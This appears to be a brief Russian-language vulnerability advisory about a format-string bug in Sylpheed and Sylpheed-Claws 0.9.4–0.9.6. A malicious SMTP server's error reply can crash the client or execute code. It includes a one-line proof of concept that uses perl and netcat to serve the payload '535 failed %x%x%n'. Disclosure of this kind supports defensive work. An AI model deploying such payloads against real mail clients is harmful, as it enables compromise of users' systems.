Программа: Sylpheed-claws 0.9.6 — 0.9.4 

Уязвимость обнаружена в Sylpheed и Sylpheed-Claws. Злонамеренный пользователь может скомпрометировать систему пользователя.
Уязвимость связанна с ошибкой форматной строки при обработке сообщений об ошибках от SMTP сервера. Злонамеренный SMTP сервер может возвратить специально обработанное сообщение об ошибке, чтобы выполнить произвольный код на системе пользователя. 

Пример/Эксплоит: 

Create a test account with smtp server localhost:1234
Then do:
perl -e ‘print «535 failed %x%x%n\r\n»‘ | nc -l -p 1234
Then send a message.
Actual result — sylpheed crashes.



Оставить мнение